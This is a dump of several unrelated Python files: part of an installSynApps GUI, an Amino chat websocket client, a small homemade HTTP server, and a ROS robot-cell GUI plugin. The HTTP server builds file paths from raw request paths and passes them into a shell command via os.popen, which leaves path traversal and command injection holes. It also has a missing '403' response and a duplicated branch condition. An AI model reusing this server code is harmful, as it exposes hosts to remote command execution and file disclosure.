if not target:  # askdirectory() returns an empty string when cancelled
self.writeToLog('Operation cancelled.\n')
else:
self.writeToLog('Moving and unpacking to: {}\n'.format(target))
shutil.move(os.path.join(self.packager.output_location, self.package_output_filename), os.path.join(target, self.package_output_filename))
current = os.getcwd()
os.chdir(target)
subprocess.call(['tar', '-xzf', self.package_output_filename])
os.remove(self.package_output_filename)
os.chdir(current)
self.writeToLog('Done.')
# ---------------- Start the GUI ---------------
root = Tk()
root.title("installSynApps")
try:
root.iconbitmap('docs/assets/isaIcon.ico')
except:
pass
root.resizable(False, False)
gui = InstallSynAppsGUI(root)
root.mainloop()
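# Usage note (illustrative): running this module directly (e.g. `python3 installGUI.py`)
# starts the GUI immediately via the module-level code above. It is assumed to be run
# from the installSynApps repository root so that the default 'configure' directory,
# the 'resources' templates used by newConfig(), and 'docs/assets/isaIcon.ico' resolve
# relative to the current working directory.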
|
socket.py
|
import time
import json
import websocket
import threading
import contextlib
from sys import _getframe as getframe
from .lib.util import objects
class SocketHandler:
def __init__(self, client, socket_trace = False, debug = False):
# websocket.enableTrace(True)
self.socket_url = "wss://ws1.narvii.com"
self.client = client
self.debug = debug
self.active = True
self.headers = None
self.socket = None
self.socket_thread = None
self.reconnect = True
self.socket_stop = False
self.socketDelay = 0
self.socket_trace = socket_trace
self.socketDelayFetch = 120 # Reconnects every 120 seconds.
def run_socket(self):
threading.Thread(target=self.reconnect_handler).start()
websocket.enableTrace(self.socket_trace)
def reconnect_handler(self):
# Made by enchart#3410 thx
# Fixed by The_Phoenix#3967
# Fixed by enchart again lmao
# Fixed by Phoenix one more time lol
while True:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay : {self.socketDelay}")
if self.socketDelay >= self.socketDelayFetch and self.active:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay >= {self.socketDelayFetch}, Reconnecting Socket")
self.close()
self.start()
self.socketDelay = 0
self.socketDelay += 5
if not self.reconnect:
if self.debug:
print(f"[socket][reconnect_handler] reconnect is False, breaking")
break
time.sleep(5)
def on_open(self):
if self.debug:
print("[socket][on_open] Socket Opened")
def on_close(self):
if self.debug:
print("[socket][on_close] Socket Closed")
self.active = False
if self.reconnect:
if self.debug:
print("[socket][on_close] reconnect is True, Opening Socket")
def on_ping(self, data):
if self.debug:
print("[socket][on_ping] Socket Pinged")
with contextlib.suppress(Exception):
self.socket.sock.pong(data)
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
if self.debug:
print(f"[socket][send] Sending Data : {data}")
self.socket.send(data)
def start(self):
if self.debug:
print(f"[socket][start] Starting Socket")
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message = self.handle_message,
on_open = self.on_open,
on_close = self.on_close,
on_ping = self.on_ping,
header = self.headers
)
threading.Thread(target = self.socket.run_forever, kwargs = {"ping_interval": 60}).start()
self.reconnect = True
self.active = True
if self.debug:
print(f"[socket][start] Socket Started")
def close(self):
if self.debug:
print(f"[socket][close] Closing Socket")
self.reconnect = False
self.active = False
self.socket_stop = True
try:
self.socket.close()
except Exception as closeError:
if self.debug:
print(f"[socket][close] Error while closing Socket : {closeError}")
return
class Callbacks:
def __init__(self, client):
self.client = client
self.handlers = {}
self.methods = {
304: self._resolve_chat_action_start,
306: self._resolve_chat_action_end,
1000: self._resolve_chat_message
}
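# chat_methods maps "<type>:<mediaType>" keys from incoming chat messages to the
# corresponding handler method; unknown keys fall back to self.default.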
self.chat_methods = {
"0:0": self.on_text_message,
"0:100": self.on_image_message,
"0:103": self.on_youtube_message,
"1:0": self.on_strike_message,
"2:110": self.on_voice_message,
"3:113": self.on_sticker_message,
"50:0": self.TYPE_USER_SHARE_EXURL,
"51:0": self.TYPE_USER_SHARE_USER,
"52:0": self.on_voice_chat_not_answered,
"53:0": self.on_voice_chat_not_cancelled,
"54:0": self.on_voice_chat_not_declined,
"55:0": self.on_video_chat_not_answered,
"56:0": self.on_video_chat_not_cancelled,
"57:0": self.on_video_chat_not_declined,
"58:0": self.on_avatar_chat_not_answered,
"59:0": self.on_avatar_chat_not_cancelled,
"60:0": self.on_avatar_chat_not_declined,
"100:0": self.on_delete_message,
"101:0": self.on_group_member_join,
"102:0": self.on_group_member_leave,
"103:0": self.on_chat_invite,
"104:0": self.on_chat_background_changed,
"105:0": self.on_chat_title_changed,
"106:0": self.on_chat_icon_changed,
"107:0": self.on_voice_chat_start,
"108:0": self.on_video_chat_start,
"109:0": self.on_avatar_chat_start,
"110:0": self.on_voice_chat_end,
"111:0": self.on_video_chat_end,
"112:0": self.on_avatar_chat_end,
"113:0": self.on_chat_content_changed,
"114:0": self.on_screen_room_start,
"115:0": self.on_screen_room_end,
"116:0": self.on_chat_host_transfered,
"117:0": self.on_text_message_force_removed,
"118:0": self.on_chat_removed_message,
"119:0": self.on_text_message_removed_by_admin,
"120:0": self.on_chat_tip,
"121:0": self.on_chat_pin_announcement,
"122:0": self.on_voice_chat_permission_open_to_everyone,
"123:0": self.on_voice_chat_permission_invited_and_requested,
"124:0": self.on_voice_chat_permission_invite_only,
"125:0": self.on_chat_view_only_enabled,
"126:0": self.on_chat_view_only_disabled,
"127:0": self.on_chat_unpin_announcement,
"128:0": self.on_chat_tipping_enabled,
"129:0": self.on_chat_tipping_disabled,
"65281:0": self.on_timestamp_message,
"65282:0": self.on_welcome_message,
"65283:0": self.on_invite_message
}
self.chat_actions_start = {
"Typing": self.on_user_typing_start,
}
self.chat_actions_end = {
"Typing": self.on_user_typing_end,
}
def _resolve_chat_message(self, data):
key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
return self.chat_methods.get(key, self.default)(data)
def _resolve_chat_action_start(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_start.get(key, self.default)(data)
def _resolve_chat_action_end(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_end.get(key, self.default)(data)
def resolve(self, data):
data = json.loads(data)
return self.methods.get(data["t"], self.default)(data)
def call(self, type, data):
if type in self.handlers:
for handler in self.handlers[type]:
handler(data)
def event(self, type):
def registerHandler(handler):
if type in self.handlers:
self.handlers[type].append(handler)
else:
self.handlers[type] = [handler]
return handler
return registerHandler
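# event() is a decorator factory: it registers the wrapped function as a handler for
# the named event, which call() later invokes with the parsed payload. Illustrative
# usage (the instance names below are assumptions, not part of this module):
#
#   callbacks = Callbacks(client)
#   @callbacks.event("on_text_message")
#   def handle_text(event):
#       print(event)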
def on_text_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_image_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_youtube_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_strike_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_sticker_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_EXURL(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_USER(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_delete_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_join(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_leave(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_invite(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_background_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_title_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_icon_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_content_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_host_transfered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_force_removed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_removed_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_removed_by_admin(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tip(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_pin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_open_to_everyone(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invited_and_requested(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invite_only(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_unpin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_timestamp_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_welcome_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_invite_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def default(self, data): self.call(getframe(0).f_code.co_name, data)
|
main.py
|
import socket
import multiprocessing
import atexit
import os
import datetime
from urllib.parse import unquote
clist = []
addrlist = []
plist = []
response_codes = {
"200": "HTTP/1.0 200 OK\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n",
"400": "HTTP/1.0 400 Bad request\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>",
"404": "HTTP/1.0 404 Not Found\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>404 Not Found</h1>YThe requested file or directory is not exist</body></html>",
"500": "HTTP/1.0 500 Internal Server Error\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>500 Internal Server Error</h1>Server ran into a problem :(</body></html>",
"503": "HTTP/1.0 503 Service Unavailable\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>503 Service Unavailable</h1>There is a problem with server</body></html>"
}
def getconfig():
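# Reads config.cfg, which holds one "key:value" entry per line (lines containing '#'
# are skipped). An illustrative file might look like:
#   root_dir:/var/www/
#   enable_php:0
#   php_path:/usr/bin/php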
root_dir = ""
enable_php = ""
php_path = ""
with open("config.cfg", "r") as f:
lines = f.readlines()
for line in lines:
if "#" not in line:
line = line.split(":")
if line[0] == "root_dir":
root_dir = line[1].strip()
elif line[0] == "enable_php":
enable_php = int(line[1].strip())
elif line[0] == "php_path":
php_path = line[1].strip()
return root_dir, enable_php, php_path
def log(data2log):
with open("logs.txt", "a") as f:
f.write(str(datetime.datetime.now()) + ", " + str(data2log) + "\n")
def closesocket(sock):
sock.shutdown(socket.SHUT_RDWR)
sock.close()
log("Socket Closed " + str(sock))
def callphp(filepath):
last = b""
config = getconfig()
result = os.popen(config[2] + " -f " + filepath).read()
return result
def killthreads():
global plist
for p in plist:
p.terminate()
log("Server Closed")
def preparefileandrespond(filepath, c):
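# Routes a request path: the root and directories serve index.html, index.php (through
# PHP when enabled), or a generated directory listing; ordinary files are returned
# directly, with .php files passed through callphp; failures fall back to a 404 response.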
global response_codes
root_dir, enable_php, php_path = getconfig()
if filepath == "/":
#if rootdir
isindexhtml = os.path.isfile(root_dir + "index.html")
isindexphp = os.path.isfile(root_dir + "index.php")
if isindexhtml == True:
with open(root_dir + "index.html") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
elif isindexphp == True:
if enable_php != 1:
print("enable_php off canceling request")
c.sendall(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + "index.php")
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
filecontent = os.listdir(root_dir)
response_head = "<html><head><title>list of /</title></head><body><h1>Kral4 HTTP Server</h1>"
response_body = ""
response_end = "</body></html>"
for content in filecontent:
response_body += f"<a href='{content}'>{content}</a>"
filecontent = response_head + response_body + response_end
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
#if not rootdir
isdir = os.path.isdir(root_dir + filepath)
isfile = os.path.isfile(root_dir + filepath)
if isdir == True:
isindexhtml = os.path.isfile(root_dir + "index.html")
isindexphp = os.path.isfile(root_dir + "index.php")
if isindexhtml == True:
with open(root_dir + "index.html") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
elif isindexphp == True:
if enable_php != 1:
print("enable_php off canceling request")
c.sendall(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + "index.php")
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
filecontent = os.listdir(root_dir)
response_head = "<html><head><title>list of /</title></head><body><h1>Kral4 HTTP Server</h1>"
response_body = ""
response_end = "</body></html>"
for content in filecontent:
response_body += f"<a href='{content}'>{content}</a>"
filecontent = response_head + response_body + response_end
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
elif isfile == True:
if "." in filepath:
fileext = filepath.split(".")
if fileext[-1] == "php":
if enable_php != 1:
print("enable_php off canceling request")
c.sendall(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + filepath)
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
with open(root_dir + filepath, "r") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
with open(root_dir + filepath, "r") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
#Even if isdir and isfile both return False, try serving the path anyway; written quickly and may contain bugs
try:
if "php" in filepath:
if enable_php != 1:
print("enable_php off canceling request")
c.sendall(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + filepath)
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
with open(root_dir + filepath, "r") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
except:
c.sendall(response_codes["404"].encode())
closesocket(c)
def processandrespond(c, data):
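# Parses the request line (method, path, HTTP version) and the User-Agent header from
# the split request, URL-decodes the path, and hands it to preparefileandrespond;
# incomplete requests get a 400 response.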
global response_codes
request_method = ""
request_path = ""
http_version = ""
user_agent = ""
for d in data:
if b"HTTP" in d:
httpline = d.decode().split(" ")
request_method = httpline[0]
request_path = httpline[1]
http_version = httpline[2]
elif b"User-Agent" in d:
useragentline = d.decode().split("User-Agent:")
user_agent = useragentline[1]
if request_method and request_path and http_version and user_agent != "":
request_path = unquote(request_path)
print(request_method, request_path, http_version, user_agent)
preparefileandrespond(request_path, c)
else:
c.sendall(response_codes['400'].encode())
closesocket(c)
log(request_method + " " + request_path + " " + http_version + " " + user_agent + " " + str(c))
def receivefromclient(c):
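# Reads up to 4096 bytes from the client, splits the request into lines on CRLF (or LF),
# and spawns a separate process to build the response; anything else gets a 400.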
global response_codes
data = c.recv(4096)
if b"\r\n" in data:
data = data.split(b"\r\n")
p = multiprocessing.Process(target=processandrespond, args=(c, data))
p.start()
plist.append(p)
elif b"\r\n" in data:
data = data.split(b"\n")
p = multiprocessing.Process(target=processandrespond, args=(c, data))
p.start()
plist.append(p)
else:
c.sendall(response_codes["400"].encode())
closesocket(c)
def accept(s):
global clist
global addrlist
global plist
while True:
c, addr = s.accept()
clist.append(c)
addrlist.append(addr)
p = multiprocessing.Process(target=receivefromclient, args=(c,))
p.start()
plist.append(p)
log("Connection Accepted " + str(addr) + str(c))
def main():
global plist
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", 8080))
s.listen()
print("listening")
atexit.register(killthreads)
p = multiprocessing.Process(target=accept, args=(s,))
p.start()
plist.append(p)
log("Server Started")
if __name__ == "__main__":
main()
|
experiment_gui_module.py
|
import os
import rospy
import rospkg
import collections
import time
import sys
import subprocess
import numpy as np
from qt_gui.plugin import Plugin
from python_qt_binding import loadUi
from python_qt_binding.QtWidgets import QWidget, QDialog
from python_qt_binding.QtCore import QMutex, QMutexLocker,QSemaphore, QThread
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from execute_gui_steps import GUI_Step_Executor
from rpi_arm_composites_manufacturing_gui.msg import GUIStepAction, GUIStepGoal
from safe_kinematic_controller.msg import ControllerState as controllerstate
from safe_kinematic_controller.msg import ControllerMode
from safe_kinematic_controller.srv import SetControllerMode, SetControllerModeRequest
from rpi_arm_composites_manufacturing_process.msg import ProcessStepAction, ProcessStepGoal, ProcessState, ProcessStepFeedback
import actionlib
from rqt_console import console_widget
from rqt_console import message_proxy_model
from rqt_plot import plot
import rosservice
import rviz
import safe_kinematic_controller.ros.commander as controller_commander_pkg
from panel_selector_window_enlarged import PanelSelectorWindow
from user_authentication_window import UserAuthenticationWindow
#TODO Integrate pyqtgraph into automatic package download
import pyqtgraph as pg
import threading
'''
freeBytes=QSemaphore(100)
usedBytes=QSemaphore()
consoleData=collections.deque(maxlen=200)
'''
class LEDIndicator(QAbstractButton):
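# LED-style status widget: a round checkable button painted with radial gradients,
# green when checked and red when unchecked (callers disable it so it acts as a status light).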
scaledSize=1000.0
def __init__(self):
QAbstractButton.__init__(self)
self.setMinimumSize(24, 24)
self.setCheckable(True)
# Green
self.on_color_1 = QColor(0, 255, 0)
self.on_color_2 = QColor(0, 192, 0)
self.off_color_1 = QColor(255, 0, 0)
self.off_color_2 = QColor(128, 0, 0)
def resizeEvent(self, QResizeEvent):
self.update()
def paintEvent(self, QPaintEvent):
realSize = min(self.width(), self.height())
painter = QPainter(self)
pen = QPen(Qt.black)
pen.setWidth(1)
painter.setRenderHint(QPainter.Antialiasing)
painter.translate(self.width() / 2, self.height() / 2)
painter.scale(realSize / self.scaledSize, realSize / self.scaledSize)
gradient = QRadialGradient(QPointF(-500, -500), 1500, QPointF(-500, -500))
gradient.setColorAt(0, QColor(224, 224, 224))
gradient.setColorAt(1, QColor(28, 28, 28))
painter.setPen(pen)
painter.setBrush(QBrush(gradient))
painter.drawEllipse(QPointF(0, 0), 500, 500)
gradient = QRadialGradient(QPointF(500, 500), 1500, QPointF(500, 500))
gradient.setColorAt(0, QColor(224, 224, 224))
gradient.setColorAt(1, QColor(28, 28, 28))
painter.setPen(pen)
painter.setBrush(QBrush(gradient))
painter.drawEllipse(QPointF(0, 0), 450, 450)
painter.setPen(pen)
if self.isChecked():
gradient = QRadialGradient(QPointF(-500, -500), 1500, QPointF(-500, -500))
gradient.setColorAt(0, self.on_color_1)
gradient.setColorAt(1, self.on_color_2)
else:
gradient = QRadialGradient(QPointF(500, 500), 1500, QPointF(500, 500))
gradient.setColorAt(0, self.off_color_1)
gradient.setColorAt(1, self.off_color_2)
painter.setBrush(gradient)
painter.drawEllipse(QPointF(0, 0), 400, 400)
@pyqtProperty(QColor)
def onColor1(self):
return self.on_color_1
@onColor1.setter
def onColor1(self, color):
self.on_color_1 = color
@pyqtProperty(QColor)
def onColor2(self):
return self.on_color_2
@onColor2.setter
def onColor2(self, color):
self.on_color_2 = color
@pyqtProperty(QColor)
def offColor1(self):
return self.off_color_1
@offColor1.setter
def offColor1(self, color):
self.off_color_1 = color
@pyqtProperty(QColor)
def offColor2(self):
return self.off_color_2
@offColor2.setter
def offColor2(self, color):
self.off_color_2 = color
class VacuumConfirm(QWidget):
def __init__(self):
super(VacuumConfirm,self).__init__()
class ConsoleThread(QThread):
def __init__(self,State_info):
super(ConsoleThread,self).__init__()
self.State_info=State_info
def run(self):
while(True):
usedBytes.acquire()
dataval=consoleData.pop()
self.State_info.addItem(dataval)
self.State_info.scrollToBottom()
#print dataval
freeBytes.release()
class RQTPlotWindow(QMainWindow):
def __init__(self, parent=None):
super(RQTPlotWindow, self).__init__(None)
self.rqtgraph=plot.Plot(parent)
class ExperimentGUI(Plugin):
repaint_signal= pyqtSignal()
LED_change_signal=pyqtSignal()
callback_signal=pyqtSignal(controllerstate)
#signal name=pyqtSignal(datatype,datatype)
def __init__(self, context):
super(ExperimentGUI, self).__init__(context)
# Give QObjects reasonable names
self.plans=['Starting Position','Above Panel', 'Panel Grabbed','Above Placement Nest','Panel Placed']
#state_dict ties each state to planlistindex values
#self.state_dict={'reset_position':0,'pickup_prepare':1,'pickup_lower':2,'pickup_grab_first_step':2,'pickup_grab_second_step':2,'pickup_raise':2,'transport_panel':3,'place_lower':4,'place_set_first_step':4,'place_set_second_step':4,'place_raise':4}
self.gui_execute_states=["reset","panel_pickup","pickup_grab","transport_panel","place_panel"]
self.execute_states=[['plan_to_reset_position','move_to_reset_position'],['plan_pickup_prepare','move_pickup_prepare'],['plan_pickup_lower','move_pickup_lower','plan_pickup_grab_first_step','move_pickup_grab_first_step','plan_pickup_grab_second_step','move_pickup_grab_second_step','plan_pickup_raise','move_pickup_raise'],
['plan_transport_payload','move_transport_payload'],['plan_place_set_second_step']]
self.teleop_modes=['Error','Off','Joint','Cartesian','Cylindrical','Spherical']
self.current_teleop_mode=1
self.teleop_button_string="Tele-op\nMode:\n"
self.setObjectName('MyPlugin')
self._lock=threading.Lock()
#self._send_event=threading.Event()
#self.controller_commander=controller_commander_pkg.ControllerCommander()
# Process standalone plugin command-line arguments
from argparse import ArgumentParser
parser = ArgumentParser()
# Add argument(s) to the parser.
parser.add_argument("-q", "--quiet", action="store_true",
dest="quiet",
help="Put plugin in silent mode")
args, unknowns = parser.parse_known_args(context.argv())
if not args.quiet:
print('arguments: {}'.format(args))
print('unknowns: {}'.format(unknowns))
# Create QWidget
self.in_process=None
self.recover_from_pause=False
#rospy.get_param("rosbag_name")
#<param name="start_time" command="date +'%d-%m-%Y_%Ih%Mm%S'"/>
#rosbag record args="record -O arg('start_time')
self._mainwidget = QWidget()
self.layout = QGridLayout()
self._mainwidget.setLayout(self.layout)
self.disconnectreturnoption=False
self.stackedWidget=QStackedWidget()#self._mainwidget)
self.layout.addWidget(self.stackedWidget,0,0)
self._welcomescreen=QWidget()
self._runscreen=QWidget()
self._errordiagnosticscreen=QWidget()
self.stackedWidget.addWidget(self._welcomescreen)
self.stackedWidget.addWidget(self._runscreen)
#self.stackedWidget.addWidget(self._errordiagnosticscreen)
#self._data_array=collections.deque(maxlen=500)
self._proxy_model=message_proxy_model.MessageProxyModel()
self._rospack=rospkg.RosPack()
#self.console=console_widget.ConsoleWidget(self._proxy_model,self._rospack)
self.robotconnectionled=LEDIndicator()
self.robotconnectionled.setDisabled(True) # Make the led non clickable
self.forcetorqueled=LEDIndicator()
self.forcetorqueled.setDisabled(True) # Make the led non clickable
self.overheadcameraled=LEDIndicator()
self.overheadcameraled.setDisabled(True) # Make the led non clickable
self.grippercameraled=LEDIndicator()
self.grippercameraled.setDisabled(True) # Make the led non clickable
self.runscreenstatusled=LEDIndicator()
self.runscreenstatusled.setDisabled(True)
self.step_executor=GUI_Step_Executor()
self.step_executor.error_signal.connect(self._feedback_receive)
self.step_executor.success_signal.connect(self.process_state_set)
self.repaint_signal.connect(self._repaint)
#self.callback_signal.connect(self.callback_gui)
#self.step_executor.error_function=self._feedback_receive
#Need this to pause motions
self.process_client=actionlib.ActionClient('process_step', ProcessStepAction)
self.process_client.wait_for_server()
self.placement_targets={'leeward_mid_panel':'panel_nest_leeward_mid_panel_target','leeward_tip_panel':'panel_nest_leeward_tip_panel_target'}
self.placement_target='panel_nest_leeward_mid_panel_target'
self.panel_type='leeward_mid_panel'
self.client_handle=None
service_list=rosservice.get_service_list()
if('/overhead_camera/trigger' in service_list):
self.led_change(self.overheadcameraled,True)
else:
self.led_change(self.overheadcameraled,False)
if('/gripper_camera_2/trigger' in service_list):
self.led_change(self.grippercameraled,True)
else:
self.led_change(self.grippercameraled,False)
self.mode=0
self.count=0
self.data_count=0
self.force_torque_data=np.zeros((6,1))
self.joint_angle_data=np.zeros((6,1))
# Get path to UI file which should be in the "resource" folder of this package
self.welcomescreenui = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'welcomeconnectionscreen.ui')
self.runscreenui = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'Runscreenadvanced.ui')
self.skippingrunscreenui=os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'Runscreenadvanced.ui')
self.errorscreenui = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'errordiagnosticscreen.ui')
self.retry_button = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'images', 'retry.png')
self.play_button = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'images', 'play.png')
self.rewound=False
self.pre_reset_list_index=0
# Extend the widget with all attributes and children from UI file
loadUi(self.welcomescreenui, self._welcomescreen)
loadUi(self.runscreenui, self._runscreen)
loadUi(self.errorscreenui,self._errordiagnosticscreen)
# Give QObjects reasonable names
self._mainwidget.setObjectName('MyPluginUi')
# Show _widget.windowTitle on left-top of each plugin (when
# it's set in _widget). This is useful when you open multiple
# plugins at once. Also if you open multiple instances of your
# plugin at once, these lines add number to make it easy to
# tell from pane to pane.
if context.serial_number() > 1:
self._mainwidget.setWindowTitle(self._mainwidget.windowTitle() + (' (%d)' % context.serial_number()))
context.add_widget(self._mainwidget)
self.context=context
self.plugin_settings=None
self.instance_settings=None
#self._errordiagnosticscreen.consoleWidget=console_widget.ConsoleWidget(self._proxy_model,self._rospack)
#####consoleThread=ConsoleThread(self._widget.State_info)
#self._errordiagnosticscreen.backToRun.pressed.connect(self._to_run_screen)
# self._welcomescreen.statusFormLayout.takeAt(0)
self._welcomescreen.statusFormLayout.addWidget(self.robotconnectionled,0,0)
self._welcomescreen.statusFormLayout.addWidget(self.forcetorqueled,2,0)
self._welcomescreen.statusFormLayout.addWidget(self.overheadcameraled,4,0)
self._welcomescreen.statusFormLayout.addWidget(self.grippercameraled,6,0)
#self._runscreen.connectionLayout.addWidget(self.runscreenstatusled,0,1)
#self._welcomescreen.robotConnectionWidget.addWidget(self.led)
#consoleThread.finished.connect(app.exit)
#####consoleThread.start()
#self.rviz_starter=os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'src', 'rpi_arm_composites_manufacturing_gui', 'rviz_starter.py')
# Add widget to the user interface
#context.add_widget(console)==QDialog.Accepted
#context.add_widget(rqt_console)
#self._runscreen.planList.setSelectionMode(QAbstractItemView.ExtendedSelection)
#for entry in self.plans:
# listentry=QListWidgetItem(entry)
# listentry.setFlags(Qt.ItemIsSelectable)
# self._runscreen.planList.addItem(listentry)
#self._runscreen.planList.item(0).setSelected(True)
self.shared_control_enabled=False
